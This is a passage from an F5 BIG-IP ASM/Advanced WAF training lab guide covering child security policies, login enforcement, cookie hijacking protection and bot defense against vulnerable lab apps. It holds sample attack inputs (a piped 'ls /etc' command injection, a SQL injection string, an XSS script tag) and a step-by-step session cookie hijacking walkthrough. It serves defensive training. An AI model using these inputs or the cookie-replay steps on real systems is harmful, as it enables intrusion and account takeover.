F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 69
ASM Lesson 9 – Parent and Child Security Policies

Task 4 – Test the Child Security Policy

Use iMacros for Mozilla Firefox to generate traffic for building the child security policy, and then attempt
a couple violations.

− Open a New private window (Firefox) and click the iMacros button, then in the iMacros pane
select Exercises > auto build.iim, and then click Play (Loop). Wait for the macro to complete before moving on.
− In the Configuration Utility open the Traffic Learning page.
The child security policy is already learning file types, showing that file type enforcement is underway.
− In the DVWA page log in as hacker / hackyou.
− Click Command Execution, then copy and paste the following in the field, and then click Submit.
1 | ls /etc

− Click the DVWA bookmark, then click XSS stored, then create an entry named Order notes, then copy and paste
the following Review, and then click Submit Review.
Please bill my credit card #4012-8888-8888-1881.

The web application is already protected against common attack signatures and information leakage.
− Click Setup, and then click Create / Reset Database.

IF TIME PERMITS – Create a Second Child Security Policy

Create another child security policy for hackazon_virtual that uses parent_security_policy.

− In the Configuration Utility open the Policies List page click parent_security_policy, and then
click Inheritance Settings.
− For Attack Signatures, change the Inheritance Settings to None, and then click Save.

→NOTE: You’re changing this setting now due to a bug in ASM v15.1.

− Click the back-arrow button to return to the Policies List page, then click Create, and then use the following
information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Comprehensive
Parent Policy parent_security_policy
Virtual Server hackazon_virtual (HTTP)

− Once the policy is created, click parent_security_policy, and then click Inheritance Settings.
− For Attack Signatures, change the Inheritance Settings back to Mandatory, and then click Save.
− Click the back-arrow button to return to the Policies List page, then click hackazon_security_policy, and then view
the Inheritance Settings.
You’ll accept all optional security policy settings.
− Open the Parameters List page, and then click the wildcard (*).
− Clear the Perform Staging checkbox.
− For Maximum Length select the Any option, then click Update, and then click Apply Policy.
− In Firefox click the Hack bookmark.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 70
ASM Lesson 9 – Parent and Child Security Policies
− In the search box, copy and paste the following into the field, and then click Submit.
%' or 1='1

− Click the Hack bookmark, then click FAQ, then create a FAQ using your email address and copy and paste the
following Question, and then click Submit.
Please check my account number 536-90-9080.

The web application is immediately protected against common attack signatures and information leakage.
− Close the Firefox window.

PREPARE FOR NEXT EXERCISE

− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
tmsh delete ltm virtual hackazon_virtual
tmsh delete ltm pool hackazon_pool
tmsh delete ltm node 10.1.20.20
tmsh delete ltm policy asm_auto_l7_policy__hackazon_virtual
tmsh delete asm policy hackazon_security_policy
tmsh delete asm policy parent_security_policy
exit

Question and Answer Key

Task 2 – Create a Child Security Policy
Q: Of the following parent policy settings, which can be changed, and which can’t?
A: Application Language: Can’t be changed
Enforcement Mode: Can be changed
Policy Builder Learning Mode: Can’t be changed
Auto-Added Signature Accuracy: Can be changed
Trusted IP Addresses: Can be changed
Policy Builder Learning Speed: Can’t be changed
Signature Staging: Can be changed
Server Technologies: Can’t be changed
Policy is Case Sensitive: Can’t be changed

Q: Which options can be declined?

A: Data Guard and Server Technologies

Task 3 – Examine Child Inheritance

Q: Were you able to delete the server technology?
A: Yes

Q: Why or why not?

A: This category was marked as Optional in the parent policy and we chose to Decline the
inheritance requirements.

Q: Were you able to delete Iran?

A: No

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 71
ASM Lesson 9 – Parent and Child Security Policies
Q: Were you able to add North Korea?
A: Yes

Q: Why did you get these results?

A: This category was marked as Mandatory in the parent policy.

Q: Will other child security policies see North Korea as a disallowed geolocation?
A: No

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 72
ASM Lesson 10 – Login Enforcement and Violation Detection

ASM Lesson 10 – Login Enforcement and Violation

Detection

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 73
ASM Lesson 10 – Login Enforcement and Violation Detection

Exercise – Use Login Enforcement and Violation

Detection
• Estimated completion time: 45 minutes.

Task 1 – Create a Security Policy without Session Tracking

Create a security policy for dvwa_virtual, and then examine how the ASM tracks session details in the log file.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment
Virtual Server dvwa_virtual (HTTP)
Enforcement Mode Blocking
Policy Builder Learning Automatic
Mode
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

Signature Staging Disabled

− Once the policy is created open the Learning and Blocking Settings page.
− Expand URLs, and then from the Learn New HTTP URLs list select Always, then click Save, and then
click Apply Policy.
− Open a New private window (Firefox) and click the DVWA bookmark, and then close the Firefox window.
− In the Configuration Utility, open the Policies List page and click dvwa_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Builder Learning Mode click the Disabled button, then click Save, and then click Apply Policy.
− Open Firefox and click the DVWA bookmark, and then log in as hacker / hackyou.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Select the most recent (higher in the list) /login.php log entry and on the right-side of the page click All Details.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 74
ASM Lesson 10 – Login Enforcement and Violation Detection
− Note the Device ID, Username, and Session ID values.

Although the session ID is being tracked, the device ID and username currently aren’t.

Task 2 – Add Login Page Enforcement

Examine how you can bypass the DVWA login page, and then add login page enforcement for dvwa_security_policy.

− In the DVWA page click Logout, and then examine the DVWA login page.
Users should always log in before submitting requests to the web application.
− Copy and paste the following in the URL field (at the top of the page), and then press Enter.
http://10.1.10.35/vulnerabilities/sqli/?id=1&Submit=Submit#

− Copy and paste the following in the URL field, and then press Enter.
http://10.1.10.35/vulnerabilities/xss_r/?name=Bob+Smith#

− In the Configuration Utility reload the Event Logs > Application > Requests page.
− Select the /vulnerabilities/sqli/ log entry and view the details in the Request section.
− Select the /vulnerabilities/xss_r/ log entry and view the details in the Request section.
Although you didn’t see a response page in the DVWA page, these requests were submitted to the DVWA web
server and bypassed the login page.
− Navigate to Application Security > Sessions and Logins and right-click on Login Pages List and
select Open link in a new tab, and then in the new tab click Create.
− For Login URL leave Explicit > HTTP selected and click into the field and select /login.php.
This URL was learned by the policy builder in task 1.
− Configure the login page using the following information, and then click Create.
Authentication Type HTML Form
Username Parameter Value username
Password Parameter Value password
Expected HTTP response status code 302

− Open the Application Security > Sessions and Logins > Login Enforcement page.
− In the Authenticated URLs field copy and paste /vulnerabilities/sqli/, and then click Add.
− Copy and paste /vulnerabilities/xss_r/ into the field and click Add, and then click Save.
− Open the Learning and Blocking Settings page and expand Sessions and Logins.
− For the Login URL bypassed violation select the Block checkbox, then click Save, and then click Apply Policy.
− In the DVWA page click the DVWA bookmark, then copy and paste the following in the URL field, and
then press Enter.
http://10.1.10.35/vulnerabilities/sqli/?id=1&Submit=Submit#

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 75
ASM Lesson 10 – Login Enforcement and Violation Detection
− Click the DVWA bookmark, then copy and paste the following in the URL field, and then press Enter.
http://10.1.10.35/vulnerabilities/xss_r/?name=Bob+Smith#

− Click the DVWA bookmark, then copy and paste the following in the URL field, and then press Enter.
http://10.1.10.35/vulnerabilities/brute/?username=admin&password=password&Login=Login#

Questions:
Was the third request blocked? ___________________

Why or why not? ____________________________________________________________

− In the Configuration Utility use the second tab to open the Sessions and Logins >Login Enforcement page, then in
the Authenticated URLs field copy and paste /vulnerabilities/*, and then click Add.
− Click Save, then click Apply Policy, and then close the second tab.
− In the DVWA page click the DVWA bookmark, then copy and paste the following in the URL field, then press Enter.
http://10.1.10.35/vulnerabilities/brute/?username=admin&password=password&Login=Login#

− Click the DVWA bookmark, then copy and paste the following in the URL field, then press Enter.
http://10.1.10.35/vulnerabilities/sqli_blind/?id=10&Submit=Submit#

All URLs that being with /vulnerabilities/ now include login enforcement.
− In the Configuration Utility reload the Event Logs > Application > Requests tab.
− Select any of the blocked log entries and examine the violation and the attack type.

Task 3 – Enable Violation Detection by Username

Update dvwa_security_policy by adding session awareness and violation detection by username.

− In the blocked page click the DVWA bookmark, and then log in as hacker / hackyou.
− In the Configuration Utility reload the Event Logs > Application > Requests page.
− Select the most recent /login.php log entry, and then examine the Username value.
Because you created the Login Page element, BIG-IP ASM is now tracking the username of successful logins.
− Click on the triangle icon at the end of Username.

Session tracking is currently disabled in this security policy.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 76
ASM Lesson 10 – Login Enforcement and Violation Detection
− Navigate to Application Security > Sessions and Logins and right-click on Session Tracking and
select Open link in a new tab, and then in the new tab select the Session Awareness checkbox.
− From the Application Username, select Use Individual Login Pages.
− From the Available list select [HTTP]/login.php, and then click <<.

− On the Block All tab select the Username Threshold checkbox and enter 10 violations, then click Save,
then click Apply Policy, and then close the second tab.
− In the DVWA page click Logout, and then log in as hacker / hackyou.
− Click XSS reflected, then copy and paste the following in the field, and then click Submit.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

− Use Ctrl+F5 to reload the blocking page 5 times, and then close the blocked page.
− In the Configuration Utility reload the Event Logs > Application > Requests tab, then select the most recent
blocked log entry and examine the violation that caused the request to be blocked.
This request was blocked due to detected attack signatures.
− Open a new Firefox window and click the DVWA bookmark and log in as hacker / hackyou, then click XSS reflected,
then paste the previous entry in the field, and then click Submit.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

− Use Ctrl+F5 to reload the blocking page 10 times.

− Click the DVWA bookmark several times, and then close the blocked page.
You are no longer able to access the DVWA home page.
− Open a New private window (Firefox) and click the DVWA bookmark, and then log in as hacker / hackyou.
The request is blocked.
− Click the DVWA bookmark, then log in as bobsmith / password, and then close the page.
Only the malicious user, hacker, was blocked from logging into the web application.
− On the UDF page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− On the Traffic Generator desktop open Chrome and click the DVWA bookmark, and then log in
as hacker / hackyou, and then close the blocked page.
This user is blocked from all devices and all IP addresses.
− In the Configuration Utility reload the Event Logs > Application > Requests tab and select the most recent blocked
log entry, and then under Occurrences click 1.

The request was blocked because access was disallowed for this Username.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 77
ASM Lesson 10 – Login Enforcement and Violation Detection
− Select the triangle icon at the end of Username

The BIG-IP ASM security policy is now configured to block all requests from this user.
− Navigate to Security > Reporting > Application and right-click on Session Tracking Status and
select Open link in new tab, and then examine the new tab.

You use this page to view all usernames, device IDs, and session IDs that have triggered a violation detection
threshold value.
− Select the Block All checkbox and click Release and then OK, and then close the second tab.
− Open a New private window (Firefox) and click the DVWA bookmark, then log in as hacker / hackyou, and then
close Firefox.
This user can access the web application again.

IF TIME PERMITS – Enable Violation Detection by Device ID

Enable violation detection by device ID for dvwa_security_policy,

− In the Configuration Utility, on the Event Logs > Application > Requests tab click All Details and examine
the Device ID value.
The device ID is still not being tracked or logged.
− Navigate to Application Security > Sessions and Logins and right-click on Session Tracking and
select Open link in a new tab, and then in the new tab select the Detect Session Hijacking by Device ID Tracking
checkbox.
Note that Device-ID mode must be configured in a bot profile for this option to work.

− On the Block All tab, for Username Threshold clear the Enable checkbox.

→NOTE: It’s not required to disable the Username Threshold value. You’re disabling this to focus
on Device ID violations.

− Select the Device ID Threshold checkbox and enter 10 violations, then click Save, and then click Apply Policy.
− Open the Security > Bot Defense > Bot Defense Profiles page and click Create.
− For Profile Name enter dvwa_bot_profile.
− On the left menu select Browsers.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 78
ASM Lesson 10 – Login Enforcement and Violation Detection
− From the Device ID Mode list select Generate Before Access.
− For Verification and Device-ID Challenges in Transparent Mode, click the Enabled button, and then click Save.
− Open the Virtual Server List page and click dvwa_virtual, and then open the Security > Policies page.
− From the Bot Defense Profile list select Enabled, then select dvwa_bot_profile, then click Update, and then
close the second tab.
− Open a New private window (Firefox) and click the iMacros button, then in the iMacros pane
select Exercises > login requests.iim, then in the Max field enter 30, and then click Play (Loop).
You’ll notice the page is taking longer to reload. This is because of the browser is negotiating the device ID with
BIG-IP ASM for each request.
− In the Configuration Utility reload the Event Logs > Application > Requests page, then select the most recent log
entry and click All Details, and then examine the Device ID value.
The Device ID is now being tracked and logged.
− In the DVWA page select Exercises > malicious logins.iim, and then click Play (Loop). Once the macro fails close the
Firefox window.
− Open a New private window (Firefox) and click the DVWA bookmark.
− Click the DVWA bookmark several times, and then close the blocked page.
After enough violations from this device within the violation detection period, you are blocked from accessing
the web application from this device.
− On the Traffic Generator desktop, open Firefox and click the DVWA bookmark, and then log in
as hacker / hackyou.
The web application is available from a different device.
− Click XSS reflected, then type <script> in the field, then click Submit, then reload the blocking page
around 15 times, and then close the Firefox window.
− Open a new Firefox window and click the DVWA bookmark, and then close the blocked page.
After enough violations, this device is also blocked.
− In the Configuration Utility reload the Event Logs > Application > Requests page and select the most recent
log entry, and then under Occurrences click 1.
The cause of this blocked request was the user’s Device ID was disallowed
− Open the Reporting > Application > Session Tracking Status page.
You can see there are currently two blocked devices, and when each blocking action expires.

PREPARE FOR NEXT EXERCISE

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 79
ASM Lesson 10 – Login Enforcement and Violation Detection

Question and Answer Key

Task 2 – Add Login Page Enforcement
Q: Was the third request blocked?
A: No

Q: Why or why not?

A: The specific URL (/vulnerabilities/brute/) wasn’t added to the Authenticated URLs list.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 80
ASM Lesson 11 – Cookie Hijacking Protection

ASM Lesson 11 – Cookie Hijacking Protection

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 81
ASM Lesson 11 – Cookie Hijacking Protection

Exercise – Use Cookie Hijacking Protection

• Estimated completion time: 45 minutes.

Task 1 – Perform Session Cookie Hijacking

Use the Hackazon web application and the hacker’s attack server to simulate cookie hijacking.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the Hack Login bookmark, and then log in as cookiestealer / password.
This is a user account that the malicious user has set up on the Hackazon web application.
− Click Your Account > My profile.
The cookie stealer’s profile information displays.
− Leave the cookie stealer’s page open and open a new Firefox window and click the Hack Login bookmark, and then
log in as bobsmith / password.
− Click Your Account > My profile.
The victim’s profile information displays.
− Click the Hackazon logo, then click on a product on the page, and then click Add to Wish List.
− Open the Wish List > Wish Lists page.
The new product displays on the victim’s wish list page.
− Close the Firefox window (the victim’s page).
− Resize the PuTTY window by making it wide enough to fill your screen, and then type the following at
the CLI prompt:
tail -f /var/log/ltm

There are log entries identifying recent JSESSIONID and visited_products cookie values.
− Copy the JSESSIONID cookie value (everything from document.cookie to the closing '), and them press
the Enter key several times (to clear the screen).

− In the malicious user’s Chrome window press the F12 key to open the inspection tools.

− Select the Console tab, and then paste the copied cookie details.

− Press Enter, then close the inspection panel, and then reload the page.
The victim’s personal information displays.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 82
ASM Lesson 11 – Cookie Hijacking Protection
− Open the Wish List > Wish Lists page.
The victim’s wish list displays. The malicious user successfully hijacked a session from an unsuspecting victim.
− Close the Chrome window.

Task 2 – Create a New Security Policy for Cookie Hijacking Protection

Create a security policy for hackazon_virtual that will block cookie hijacking attempts.

− Open Chrome and click the BIGIP_A bookmark, and then log into the BIG-IP system.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Comprehensive
Virtual Server hackazon_virtual (HTTP)
Application Language Unicode (utf-8)
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open a New private window (Firefox) and click the Hack bookmark.
− Click Sign In / Sign Up, and then log in as bobsmith / password.
− Click on the Hackazon logo, then click a product on the page, then click Logout, and then close the Firefox window.
− In the Configuration Utility open the Application Security > Headers > Cookies List page.
− Select the JSESSIONID checkbox and click Enforce and then OK.

The cookie that you’re protecting must be enforced for BIG-IP ASM to block violations against it.
− Open the Learning and Blocking Settings page, and then expand Cookies.

Notice that for the Modified domain cookie(s) violation, the Learn, Alarm, and Block checkboxes are selected.
This is because you used the Comprehensive policy template.
− Expand Sessions and Logins.
Notice that for the ASM Cookie Hijacking violation, the Learn, Alarm, and Block checkboxes are also selected.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 83
ASM Lesson 11 – Cookie Hijacking Protection
− For ASM Cookie Hijacking clear the Learn, Alarm, and Block checkboxes, and then click Save.

→NOTE: You’re disabling this to illustrate how the feature works both disabled and enabled.

− In the Configuration Utility, open the Policies List page and click hackazon_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode select Disabled, then click Save, and then click Apply Policy.

Task 3 – Re-attempt the Session Cookie Hijacking

Re-attempt the session cookie hijacking attack you performed earlier.

− Open a New private window (Firefox) and click the Hack Login bookmark, then log in as bobsmith / password,
then open the Wish List > Wish Lists page, and then close the Firefox window.
− In PuTTY rerun the tail command.

In addition to the JSESSIONID cookie, there is now an additional stolen cookie that begin with TS. This cookie was
created by BIG-IP ASM to protect the web application cookies from cookie hijacking and malicious manipulation.
− Copy the new JSESSIONID cookie value (everything from document.cookie to the closing ').
− Open a New incognito window (Chrome) and click the Hack Login bookmark, then log in
as cookiestealer /password, and then open the Profile page.
− Press the F12 key, then on the Console tab paste the copied cookie details and press Enter, then reload the page,
and then close the blocked page.
The attempt to steal the victim’s session cookie is now blocked by BIG-IP ASM.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Select the blocked [HTTP] /account log entry, and then under Occurrences click 1

The request was blocked because it triggered the Modified domain cookie(s) violation for
the JSESSIONID cookie.
− View the Attack Types.
The attack type is Session Hijacking.
− Examine the bottom of the Request section.
The BIG-IP ASM log entry highlights the modified cookie within the HTTP request.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 84
ASM Lesson 11 – Cookie Hijacking Protection

Task 4 – Update the Security Policy with ASM Cookie Hijacking Protection
Update hackazon_security_policy by enabling ASM cookie hijacking protection.

− Open a New incognito window (Chrome) and click the Hack Login bookmark, then log in
as cookiestealer /password, and then open the Profile page.
− Press the F12 key, then on the Console tab paste the previously copied JSESSIONID cookie details, and then
press Enter.
− In PuTTY copy the entire BIG-IP ASM cookie value directly after the JSESSION ID cookie (everything from
document.cookie=TS01… to the closing '), and then press the Enter key several times (to clear the screen).
− Paste the cookie value into the Chrome Console, then press Enter, then close the inspection panel, and then
reload the page.
The victim’s profile displays. The malicious user successfully hijacked the victim’s session because they had both
the JSESSIONID cookie and the BIG-IP ASM cookie that is used to protect the JSESSIONID cookie.
− Close the Chrome window.
− In the Configuration Utility reload the Event Logs > Application > Requests page.
− Select the most recent [HTTP] /account log entry, and then click All Details.
Note that there is currently no Device ID value.

− Open the Learning and Blocking Settings page and expand Sessions and Logins.
− For ASM Cookie Hijacking select the Alarm and Block checkboxes, then click Save, and then click Apply Policy.
− Open the Security > Bot Defense > Bot Defense Profiles page and click Create.
− For Profile Name enter hackazon_bot_profile.
− On the left menu select Browsers.
− From the Device ID Mode list select Generate Before Access.
− For Verification and Device-ID Challenges in Transparent Mode, click the Enabled button, and then click Save.
− Open the Virtual Server List page and click hackazon_virtual, and then open the Security > Policies page.
− From the Bot Defense Profile list select Enabled, then select hackazon_bot_profile, and then click Update.
− Open a New private window (Firefox) and click the Hack Login bookmark, then quickly type Ctrl+F5 to reload the
page about 25 times, and then close the Firefox window.
You’ll notice the page is taking longer to reload. This is because of the browser is negotiating the device ID with
BIG-IP ASM for each request.
− In the Configuration Utility open the Event Logs > Application > Requests page and select the most recent
log entry, and then examine the Device ID value.
The Device ID value is now being tracked.
− Open a New private window (Firefox) and click the Hack Login bookmark, then log in as bobsmith / password,
then open the Wish List > Wish Lists page, and then close the Firefox window.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 85
ASM Lesson 11 – Cookie Hijacking Protection
− Open a New incognito window (Chrome) and click the Hack Login bookmark, then log in
as cookiestealer /password, and then open the Profile page.
− In PuTTY rerun the tail command.

There is now an additional BIG-IP ASM cookie that begins with TSPD_101=.
− Copy the JSESSIONID cookie value (everything from document.cookie to the closing ').
− In Chrome, press the F12 key, then on the Console tab paste the copied cookie details, and then press Enter.
− In PuTTY, copy the entire BIG-IP ASM cookie value directly after the JSESSION ID cookie (the one that begins
with TS) and paste it into the Chrome Console, and then press Enter, and then reload the page.
The request is now blocked by BIG-IP ASM.
− Close the blocked page, and then open a New incognito window (Chrome) and click the Hack Login bookmark,
then log in as cookiestealer /password, and then open the Profile page.
− In PuTTY copy the JSESSIONID cookie value, then paste it into the Chrome Console and press Enter.
− In PuTTY copy the entire BIG-IP ASM cookie value directly after the JSESSION ID cookie (the one that begins with
only TS) and then paste it into the Chrome Console and press Enter.
− In PuTTY, copy the longest BIG-IP ASM cookie value (one last one that begins with TSPD) and paste it into the
Chrome Console and press Enter, and reload the page, and then close the blocked page.
Even when trying to use the second BIG-IP ASM cookie, malicious users are now unable to hijack sessions.
− In the Configuration Utility reload the Event Logs> Application > Requests page, and then select the
new blocked /account log entry and for ASM Cookie Hijacking, under Occurrences click 1

The request was blocked because it triggered the Modified domain cookie(s) violation, in addition to
the ASM Cookie Hijacking violation (it was sent from the wrong device ID).

PREPARE FOR NEXT EXERCISE

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 86
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection

ASM Lesson 12 – Layer 7 Denial-of-Service and

Bot Defense Protection

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 87
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection

Exercise – Use Layer 7 DoS and Bot Defense Protection

• Estimated completion time: 60 minutes.

Task 1 – Create an Event Log Profile for Layer 7 DoS and Bot Defense Logging
Create a security policy for dvwa_virtual using the Rapid Deployment security policy, and then create a security
event log profile to log both layer 7 DoS and bot defense events, and then add the log profile to dvwa_virtual.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− If necessary, update the Windows time:
o Select the clock and click Date and time settings.
o Click Sync now, and then close the Date & time dialog box.
− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { }
} pool dvwa_pool

→NOTE: A BIG-IP ASM security policy isn’t required to use an L7 DoS profile. You’re adding this so that you can
view request details using the BIG-IP ASM event log.

− Once the policy is created open the Security > Event Logs > Logging Profiles page and click Create.
− Name the new profile dvwa_log_profile.
− Select the Application Security, DoS Protection, and Bot Defense checkboxes.
− On the Application Security tab, from the Request Type list select All requests.
− On the DoS Protection tab select the Local Publisher checkbox.
− On the Bot Defense tab select the checkboxes for all options, and then click Create.

− Open the Virtual Server List page and click dvwa_virtual, and then open the Security > Policies page.
− For Log Profile select Enabled, then from the Available list select dvwa_log_profile, then click <<, and then
click Update.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 88
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection

Task 2 – Simulate Bot Attacks

Use several attack tools to bot attacks targeting the web application.

− Open Start > XAMPP, then click Shell, and then close the XAMPP Control Panel.
− In the Shell window copy and paste (by right-clicking) the following command.
ab -n 100 -c 100 http://10.1.10.35/dvwa/images/login_logo.png

Apache Bench (ab) is a command line computer program for measuring the performance of web servers.
Apache Bench sends 200 requests for the login_logo.png file on the virtual server (10.1.10.35) and displays
the results in milliseconds.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
Because of the attack, 100 requests for the login_logo were processed by the BIG-IP ASM security policy
and forwarded to the web server.
− Select the Select all items checkbox, and then click Delete Requests.

− In the Shell window copy and paste the following command.

curl http://10.1.10.35/login.php?[1-60]

cURL is a command line tool for getting or sending files using URL syntax. The cURL result is the HTML web code
for the DVWA login page. The [1-60] code runs the curl command 60 times.
− In the Configuration Utility reload the Application > Requests page.
Because of the attack, 60 requests for the login.php URL were processed by the BIG-IP ASM security policy
and forwarded to the web server.
− Select the Select all items checkbox, and then click Delete Requests.
− In the Shell window copy and paste the following commands together.
cd c:\phantomjs\bin
phantomjs.exe index_page.js

Each time Damn Vulnerable Web App (DVWA) - Login displays indicates a successful request for the login page.
− Wait for the phantom.js command to complete before moving on.
− In the Configuration Utility reload the Application > Requests page.
Because of the attack, hundreds of requests for the index.php URL were considered legal by BIG-IP ASM
and forwarded to the web server for processing.
− Select the Select all items checkbox, and then select Delete Requests > Delete all requests.
− Open a new Chrome window and click the DVWA bookmark.
− Click the Chrome UA Spoofer button.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 89
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection
− Select Safari > Mac Safari 7.

− Click the Chrome UA Spoofer button and select Internet Explorer > Internet Explorer 6.
− Click the Chrome UA Spoofer button and select Android > Android KitKat.
− Click the Chrome UA Spoofer button and select Chrome > Default, and then close the Chrome window.
− In the Configuration Utility reload the Application > Requests page.
− Click the filter icon.

− Select the IP / Username / URL tab, then in the URL contains field type login.php, and then click Apply Filter.
This filters the list of log entries to just the requests for /login.php.
− Select each log entry from the bottom to the top and in the Request section view the User-Agent value.
The requests appear to have come from several browsers: Chrome, Safari, IE 6, and Android.
− Clear the filter by clicking on the X next to URL is /login.php, and then select the Select all items checkbox,
and then click Delete Requests.

Task 3 – Enable Bot Defense Protection

Configure a bot defense profile, and then add the profile to dvwa_virtual.

− Navigate to Security > Bot Defense and right-click on the + next to Bot Defense Profiles
and select Open link in new tab.
− In the new tab name the new profile dvwa_bot_defense_profile.
− For Enforcement Mode select Blocking.
− Under Bot Profile Configuration select Bot Mitigation Settings.
− From the Untrusted Bot list select CAPTCHA.
− From the Malicious Bot list select CAPTCHA.
− Under Bot Profile Configuration select Browsers.
− From the Browser Verification list select Verify Before Access, then modify the grace period value to 2 seconds,
and then click Save.
You’re lowering this value for the purposes of this exercise. In a production environment 300 seconds would be
an appropriate amount of time for a legitimate browser to reply to the JavaScript challenge.
− Navigate to Local Traffic and right-click on Virtual Servers and select Open link in new tab, then in the new tab
click dvwa_virtual, and then open the Security > Policies page.
− From the Bot Defense Profile list select Enabled, then for Profile select dvwa_bot_defense_profile,
and then click Update.
− Open Internet Explorer and click the DVWA bookmark, and then once the login page displays close the page.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 90
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection
− In the Configuration Utility, using the dvwa_virtual tab open the Security > Event Logs > Bot Defense >
Bot Requests page.
− Select the first [HTTP]/ log entry, and then examine the Request Status value.

This log entry was generated when the web browser was challenged.
− Select the [HTTP]/login.php log entry, then click All Details, and then examine the Request Status
and Browser Verification Status values.
The request was Accepted because the browser passed the JavaScript challenge.
− Open a New incognito window (Chrome) and click the Chrome UA Spoofer button.
− Select Safari > Mac Safari 7, and the click the DVWA bookmark.

You are presented with a CAPTCHA challenge.

− Enter the CAPTCHA challenge (which is case-sensitive) and click submit to view the DVWA login page, and then
close the Chrome window.
− In the Configuration Utility, reload the Bot Defense > Bot Requests tab, then with the newest [HTTP]/ log entry
selected click All Details, and then view the Captcha Status value.

The request was Alarmed (but allowed) because the correct CAPTCHA challenge was entered.
− Examine the Bot Name and Bot Class values.
BIG-IP AWAF identified this from the Malicious bot class, presenting itself as Safari.
− Open a New incognito window (Chrome) and click the Chrome UA Spoofer button, then
select Android > Android KitKat, and then click the DVWA bookmark.
− Enter the wrong CAPTCHA challenge and click submit, and then close the Chrome window.
− In the Configuration Utility reload the Bot Defense > Bot Requests tab, then with the newest [HTTP]/ log entry
selected click All Details, and then view the Captcha Status value.

The request was Challenged, however the incorrect CAPTCHA challenge was entered.
− In the Shell window resubmit the following command.
curl http://10.1.10.35/login.php?[1-60]

The curl commands fail because they do not pass the CAPTCHA challenge.
− In the Configuration Utility reload the Bot Defense > Bot Requests tab.
Note that all the new log entries are Challenged, but none of these requests passed the CAPTCHA challenge.

